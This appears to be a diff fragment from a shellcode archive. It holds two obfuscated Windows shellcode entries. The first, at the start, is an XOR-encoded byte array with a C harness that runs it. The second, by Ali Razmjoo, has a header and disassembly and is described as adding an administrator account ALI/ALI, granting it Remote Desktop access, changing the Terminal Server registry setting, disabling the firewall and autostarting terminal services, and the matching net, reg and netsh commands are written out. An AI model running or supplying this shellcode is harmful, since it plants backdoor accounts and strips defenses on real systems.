||||
e8: 31 d1 xor %edx,%ecx
|
||||
ea: 51 push %ecx
|
||||
eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
|
||||
f0: ba 4d 39 68 39 mov $0x3968394d,%edx
|
||||
f5: 31 d1 xor %edx,%ecx
|
||||
f7: 51 push %ecx
|
||||
f8: 89 e0 mov %esp,%eax
|
||||
fa: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
ff: c1 eb 08 shr $0x8,%ebx
|
||||
102: c1 eb 08 shr $0x8,%ebx
|
||||
105: c1 eb 08 shr $0x8,%ebx
|
||||
108: 53 push %ebx
|
||||
109: 50 push %eax
|
||||
10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
10f: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
114: 31 d3 xor %edx,%ebx
|
||||
116: ff d3 call *%ebx
|
||||
118: 31 c0 xor %eax,%eax
|
||||
11a: 50 push %eax
|
||||
11b: 68 41 41 64 64 push $0x64644141
|
||||
120: 58 pop %eax
|
||||
121: c1 e8 08 shr $0x8,%eax
|
||||
124: c1 e8 08 shr $0x8,%eax
|
||||
127: 50 push %eax
|
||||
128: b9 02 63 6b 35 mov $0x356b6302,%ecx
|
||||
12d: ba 4b 43 44 54 mov $0x5444434b,%edx
|
||||
132: 31 d1 xor %edx,%ecx
|
||||
134: 51 push %ecx
|
||||
135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
|
||||
13a: ba 43 75 2d 71 mov $0x712d7543,%edx
|
||||
13f: 31 d1 xor %edx,%ecx
|
||||
141: 51 push %ecx
|
||||
142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
|
||||
147: ba 54 5a 49 69 mov $0x69495a54,%edx
|
||||
14c: 31 d1 xor %edx,%ecx
|
||||
14e: 51 push %ecx
|
||||
14f: b9 25 34 12 67 mov $0x67123425,%ecx
|
||||
154: ba 4a 44 32 32 mov $0x3232444a,%edx
|
||||
159: 31 d1 xor %edx,%ecx
|
||||
15b: 51 push %ecx
|
||||
15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
|
||||
161: ba 6e 71 74 6d mov $0x6d74716e,%edx
|
||||
166: 31 d1 xor %edx,%ecx
|
||||
168: 51 push %ecx
|
||||
169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
|
||||
16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
|
||||
173: 31 d1 xor %edx,%ecx
|
||||
175: 51 push %ecx
|
||||
176: b9 35 15 03 2a mov $0x2a031535,%ecx
|
||||
17b: ba 67 70 6e 45 mov $0x456e7067,%edx
|
||||
180: 31 d1 xor %edx,%ecx
|
||||
182: 51 push %ecx
|
||||
183: b9 3a 17 75 46 mov $0x4675173a,%ecx
|
||||
188: ba 6f 47 55 64 mov $0x6455476f,%edx
|
||||
18d: 31 d1 xor %edx,%ecx
|
||||
18f: 51 push %ecx
|
||||
190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
|
||||
195: ba 6a 72 59 51 mov $0x5159726a,%edx
|
||||
19a: 31 d1 xor %edx,%ecx
|
||||
19c: 51 push %ecx
|
||||
19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
|
||||
1a2: ba 66 65 45 6b mov $0x6b456566,%edx
|
||||
1a7: 31 d1 xor %edx,%ecx
|
||||
1a9: 51 push %ecx
|
||||
1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
|
||||
1af: ba 53 65 61 7a mov $0x7a616553,%edx
|
||||
1b4: 31 d1 xor %edx,%ecx
|
||||
1b6: 51 push %ecx
|
||||
1b7: 89 e0 mov %esp,%eax
|
||||
1b9: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
1be: c1 eb 08 shr $0x8,%ebx
|
||||
1c1: c1 eb 08 shr $0x8,%ebx
|
||||
1c4: c1 eb 08 shr $0x8,%ebx
|
||||
1c7: 53 push %ebx
|
||||
1c8: 50 push %eax
|
||||
1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
1ce: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
1d3: 31 d3 xor %edx,%ebx
|
||||
1d5: ff d3 call *%ebx
|
||||
1d7: 31 c0 xor %eax,%eax
|
||||
1d9: 50 push %eax
|
||||
1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
|
||||
1df: ba 38 6c 53 38 mov $0x38536c38,%edx
|
||||
1e4: 31 d1 xor %edx,%ecx
|
||||
1e6: 51 push %ecx
|
||||
1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
|
||||
1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
|
||||
1f1: 31 d1 xor %edx,%ecx
|
||||
1f3: 51 push %ecx
|
||||
1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
|
||||
1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
|
||||
1fe: 31 d1 xor %edx,%ecx
|
||||
200: 51 push %ecx
|
||||
201: b9 1d 30 15 28 mov $0x2815301d,%ecx
|
||||
206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
|
||||
20b: 31 d1 xor %edx,%ecx
|
||||
20d: 51 push %ecx
|
||||
20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
|
||||
213: ba 53 5b 77 44 mov $0x44775b53,%edx
|
||||
218: 31 d1 xor %edx,%ecx
|
||||
21a: 51 push %ecx
|
||||
21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
|
||||
220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
|
||||
225: 31 d1 xor %edx,%ecx
|
||||
227: 51 push %ecx
|
||||
228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
|
||||
22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
|
||||
232: 31 d1 xor %edx,%ecx
|
||||
234: 51 push %ecx
|
||||
235: b9 20 2b 26 26 mov $0x26262b20,%ecx
|
||||
23a: ba 63 44 48 48 mov $0x48484463,%edx
|
||||
23f: 31 d1 xor %edx,%ecx
|
||||
241: 51 push %ecx
|
||||
242: b9 08 2b 23 67 mov $0x67232b08,%ecx
|
||||
247: ba 66 52 77 34 mov $0x34775266,%edx
|
||||
24c: 31 d1 xor %edx,%ecx
|
||||
24e: 51 push %ecx
|
||||
24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
|
||||
254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
|
||||
259: 31 d1 xor %edx,%ecx
|
||||
25b: 51 push %ecx
|
||||
25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
|
||||
261: ba 45 47 32 41 mov $0x41324745,%edx
|
||||
266: 31 d1 xor %edx,%ecx
|
||||
268: 51 push %ecx
|
||||
269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
|
||||
26e: ba 71 45 68 49 mov $0x49684571,%edx
|
||||
273: 31 d1 xor %edx,%ecx
|
||||
275: 51 push %ecx
|
||||
276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
|
||||
27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
|
||||
280: 31 d1 xor %edx,%ecx
|
||||
282: 51 push %ecx
|
||||
283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
|
||||
288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
|
||||
28d: 31 d1 xor %edx,%ecx
|
||||
28f: 51 push %ecx
|
||||
290: b9 34 23 23 3b mov $0x3b232334,%ecx
|
||||
295: ba 68 77 46 49 mov $0x49467768,%edx
|
||||
29a: 31 d1 xor %edx,%ecx
|
||||
29c: 51 push %ecx
|
||||
29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
|
||||
2a2: ba 73 48 65 78 mov $0x78654873,%edx
|
||||
2a7: 31 d1 xor %edx,%ecx
|
||||
2a9: 51 push %ecx
|
||||
2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
|
||||
2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
|
||||
2b4: 31 d1 xor %edx,%ecx
|
||||
2b6: 51 push %ecx
|
||||
2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
|
||||
2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
|
||||
2c1: 31 d1 xor %edx,%ecx
|
||||
2c3: 51 push %ecx
|
||||
2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
|
||||
2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
|
||||
2ce: 31 d1 xor %edx,%ecx
|
||||
2d0: 51 push %ecx
|
||||
2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
|
||||
2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
|
||||
2db: 31 d1 xor %edx,%ecx
|
||||
2dd: 51 push %ecx
|
||||
2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
|
||||
2e3: ba 49 62 78 52 mov $0x52786249,%edx
|
||||
2e8: 31 d1 xor %edx,%ecx
|
||||
2ea: 51 push %ecx
|
||||
2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
|
||||
2f0: ba 61 31 67 75 mov $0x75673161,%edx
|
||||
2f5: 31 d1 xor %edx,%ecx
|
||||
2f7: 51 push %ecx
|
||||
2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
|
||||
2fd: ba 62 64 68 73 mov $0x73686462,%edx
|
||||
302: 31 d1 xor %edx,%ecx
|
||||
304: 51 push %ecx
|
||||
305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
|
||||
30a: ba 36 33 78 69 mov $0x69783336,%edx
|
||||
30f: 31 d1 xor %edx,%ecx
|
||||
311: 51 push %ecx
|
||||
312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
|
||||
317: ba 31 52 4c 67 mov $0x674c5231,%edx
|
||||
31c: 31 d1 xor %edx,%ecx
|
||||
31e: 51 push %ecx
|
||||
31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
|
||||
324: ba 58 49 79 72 mov $0x72794958,%edx
|
||||
329: 31 d1 xor %edx,%ecx
|
||||
32b: 51 push %ecx
|
||||
32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
|
||||
331: ba 2d 65 52 6e mov $0x6e52652d,%edx
|
||||
336: 31 d1 xor %edx,%ecx
|
||||
338: 51 push %ecx
|
||||
339: b9 16 10 1f 17 mov $0x171f1016,%ecx
|
||||
33e: ba 34 58 54 52 mov $0x52545834,%edx
|
||||
343: 31 d1 xor %edx,%ecx
|
||||
345: 51 push %ecx
|
||||
346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
|
||||
34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
|
||||
350: 31 d1 xor %edx,%ecx
|
||||
352: 51 push %ecx
|
||||
353: b9 39 22 5e 50 mov $0x505e2239,%ecx
|
||||
358: ba 4b 47 39 70 mov $0x7039474b,%edx
|
||||
35d: 31 d1 xor %edx,%ecx
|
||||
35f: 51 push %ecx
|
||||
360: 89 e0 mov %esp,%eax
|
||||
362: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
367: c1 eb 08 shr $0x8,%ebx
|
||||
36a: c1 eb 08 shr $0x8,%ebx
|
||||
36d: c1 eb 08 shr $0x8,%ebx
|
||||
370: 53 push %ebx
|
||||
371: 50 push %eax
|
||||
372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
377: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
37c: 31 d3 xor %edx,%ebx
|
||||
37e: ff d3 call *%ebx
|
||||
380: 31 c0 xor %eax,%eax
|
||||
382: 50 push %eax
|
||||
383: b8 41 41 41 65 mov $0x65414141,%eax
|
||||
388: c1 e8 08 shr $0x8,%eax
|
||||
38b: c1 e8 08 shr $0x8,%eax
|
||||
38e: c1 e8 08 shr $0x8,%eax
|
||||
391: 50 push %eax
|
||||
392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
|
||||
397: ba 6d 32 5b 50 mov $0x505b326d,%edx
|
||||
39c: 31 d1 xor %edx,%ecx
|
||||
39e: 51 push %ecx
|
||||
39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
|
||||
3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
|
||||
3a9: 31 d1 xor %edx,%ecx
|
||||
3ab: 51 push %ecx
|
||||
3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
|
||||
3b1: ba 69 73 62 75 mov $0x75627369,%edx
|
||||
3b6: 31 d1 xor %edx,%ecx
|
||||
3b8: 51 push %ecx
|
||||
3b9: b9 20 41 47 36 mov $0x36474120,%ecx
|
||||
3be: ba 45 35 67 59 mov $0x59673545,%edx
|
||||
3c3: 31 d1 xor %edx,%ecx
|
||||
3c5: 51 push %ecx
|
||||
3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
|
||||
3cb: ba 47 69 44 59 mov $0x59446947,%edx
|
||||
3d0: 31 d1 xor %edx,%ecx
|
||||
3d2: 51 push %ecx
|
||||
3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
|
||||
3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
|
||||
3dd: 31 d1 xor %edx,%ecx
|
||||
3df: 51 push %ecx
|
||||
3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
|
||||
3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
|
||||
3ea: 31 d1 xor %edx,%ecx
|
||||
3ec: 51 push %ecx
|
||||
3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
|
||||
3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
|
||||
3f7: 31 d1 xor %edx,%ecx
|
||||
3f9: 51 push %ecx
|
||||
3fa: 89 e0 mov %esp,%eax
|
||||
3fc: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
401: c1 eb 08 shr $0x8,%ebx
|
||||
404: c1 eb 08 shr $0x8,%ebx
|
||||
407: c1 eb 08 shr $0x8,%ebx
|
||||
40a: 53 push %ebx
|
||||
40b: 50 push %eax
|
||||
40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
411: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
416: 31 d3 xor %edx,%ebx
|
||||
418: ff d3 call *%ebx
|
||||
41a: 31 c0 xor %eax,%eax
|
||||
41c: 50 push %eax
|
||||
41d: b8 41 41 41 6f mov $0x6f414141,%eax
|
||||
422: c1 e8 08 shr $0x8,%eax
|
||||
425: c1 e8 08 shr $0x8,%eax
|
||||
428: c1 e8 08 shr $0x8,%eax
|
||||
42b: 50 push %eax
|
||||
42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
|
||||
431: ba 52 4b 70 4d mov $0x4d704b52,%edx
|
||||
436: 31 d1 xor %edx,%ecx
|
||||
438: 51 push %ecx
|
||||
439: b9 54 3a 05 52 mov $0x52053a54,%ecx
|
||||
43e: ba 35 48 71 6f mov $0x6f714835,%edx
|
||||
443: 31 d1 xor %edx,%ecx
|
||||
445: 51 push %ecx
|
||||
446: b9 29 16 0a 47 mov $0x470a1629,%ecx
|
||||
44b: ba 4c 36 79 33 mov $0x3379364c,%edx
|
||||
450: 31 d1 xor %edx,%ecx
|
||||
452: 51 push %ecx
|
||||
453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
|
||||
458: ba 55 6d 32 5d mov $0x5d326d55,%edx
|
||||
45d: 31 d1 xor %edx,%ecx
|
||||
45f: 51 push %ecx
|
||||
460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
|
||||
465: ba 41 77 48 75 mov $0x75487741,%edx
|
||||
46a: 31 d1 xor %edx,%ecx
|
||||
46c: 51 push %ecx
|
||||
46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
|
||||
472: ba 53 59 4e 77 mov $0x774e5953,%edx
|
||||
477: 31 d1 xor %edx,%ecx
|
||||
479: 51 push %ecx
|
||||
47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
|
||||
47f: ba 72 32 78 41 mov $0x41783272,%edx
|
||||
484: 31 d1 xor %edx,%ecx
|
||||
486: 51 push %ecx
|
||||
487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
|
||||
48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
|
||||
491: 31 d1 xor %edx,%ecx
|
||||
493: 51 push %ecx
|
||||
494: 89 e0 mov %esp,%eax
|
||||
496: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
49b: c1 eb 08 shr $0x8,%ebx
|
||||
49e: c1 eb 08 shr $0x8,%ebx
|
||||
4a1: c1 eb 08 shr $0x8,%ebx
|
||||
4a4: 53 push %ebx
|
||||
4a5: 50 push %eax
|
||||
4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx
|
||||
4ab: ba 33 52 64 59 mov $0x59645233,%edx
|
||||
4b0: 31 d3 xor %edx,%ebx
|
||||
4b2: ff d3 call *%ebx
|
||||
4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx
|
||||
4b9: ba 36 54 3d 54 mov $0x543d5436,%edx
|
||||
4be: 31 d3 xor %edx,%ebx
|
||||
4c0: ff d3 call *%ebx
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
int main(){
|
||||
unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xa6\xb4\x02\x2f\xba\x33\x52\x64\x59\x31\xd3\xff\xd3\xbb\xf9\x7e\x5e\x22\xba\x36\x54\x3d\x54\x31\xd3\xff\xd3";
|
||||
fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
|
||||
(*(void(*)()) shellcode)();
|
||||
}
|
440
platforms/win64/shellcode/35794.txt
Executable file
440
platforms/win64/shellcode/35794.txt
Executable file
|
@ -0,0 +1,440 @@
|
|||
#Author: Ali Razmjoo
|
||||
? ?#Title: ?Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
|
||||
Obfuscated Shellcode Windows x64 [1218 Bytes].c
|
||||
|
||||
/*
|
||||
#Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
|
||||
#length: 1218 bytes
|
||||
#Date: 13 January 2015
|
||||
#Author: Ali Razmjoo
|
||||
#tested On: Windows 7 x64 ultimate
|
||||
|
||||
WinExec => 0x769e2c91
|
||||
ExitProcess => 0x769679f8
|
||||
====================================
|
||||
Execute :
|
||||
net user ALI ALI /add
|
||||
net localgroup Administrators ALI /add
|
||||
NET LOCALGROUP "Remote Desktop Users" ALI /add
|
||||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
|
||||
netsh firewall set opmode disable
|
||||
sc config termservice start= auto
|
||||
====================================
|
||||
|
||||
|
||||
|
||||
Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']
|
||||
|
||||
Thanks to my friends , Dariush Nasirpour and Ehsan Nezami
|
||||
|
||||
|
||||
C:\Users\Ali\Desktop>objdump -D shellcode.o
|
||||
|
||||
shellcode.o: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <.text>:
|
||||
0: 31 c0 xor %eax,%eax
|
||||
2: 50 push %eax
|
||||
3: b8 41 41 41 64 mov $0x64414141,%eax
|
||||
8: c1 e8 08 shr $0x8,%eax
|
||||
b: c1 e8 08 shr $0x8,%eax
|
||||
e: c1 e8 08 shr $0x8,%eax
|
||||
11: 50 push %eax
|
||||
12: b9 6d 76 53 52 mov $0x5253766d,%ecx
|
||||
17: ba 4d 59 32 36 mov $0x3632594d,%edx
|
||||
1c: 31 d1 xor %edx,%ecx
|
||||
1e: 51 push %ecx
|
||||
1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
|
||||
24: ba 4e 33 2d 38 mov $0x382d334e,%edx
|
||||
29: 31 d1 xor %edx,%ecx
|
||||
2b: 51 push %ecx
|
||||
2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
|
||||
31: ba 4c 34 34 31 mov $0x3134344c,%edx
|
||||
36: 31 d1 xor %edx,%ecx
|
||||
38: 51 push %ecx
|
||||
39: b9 46 47 57 46 mov $0x46574746,%ecx
|
||||
3e: ba 33 34 32 34 mov $0x34323433,%edx
|
||||
43: 31 d1 xor %edx,%ecx
|
||||
45: 51 push %ecx
|
||||
46: b9 56 50 47 64 mov $0x64475056,%ecx
|
||||
4b: ba 38 35 33 44 mov $0x44333538,%edx
|
||||
50: 31 d1 xor %edx,%ecx
|
||||
52: 51 push %ecx
|
||||
53: 89 e0 mov %esp,%eax
|
||||
55: bb 41 41 41 01 mov $0x1414141,%ebx
|
||||
5a: c1 eb 08 shr $0x8,%ebx
|
||||
5d: c1 eb 08 shr $0x8,%ebx
|
||||
60: c1 eb 08 shr $0x8,%ebx
|
||||
63: 53 push %ebx
|
||||
64: 50 push %eax
|
||||
65: bb dc 7a a8 23 mov $0x23a87adc,%ebx
|
||||
6a: ba 4d 56 36 55 mov $0x5536564d,%edx
|
||||
6f: 31 d3 xor %edx,%ebx
|
||||
71: ff d3 call *%ebx
|
||||
73: 31 c0 xor %eax,%eax
|
||||
75: 50 push %eax
|
||||
76: 68 41 41 64 64 push $0x64644141
|
||||
7b: 58 pop %eax
|
||||
7c: c1 e8 08 shr $0x8,%eax
|
||||
7f: c1 e8 08 shr $0x8,%eax
|
||||
82: 50 push %eax
|
||||
83: b9 01 41 60 32 mov $0x32604101,%ecx
|
||||
88: ba 48 61 4f 53 mov $0x534f6148,%edx
|
||||
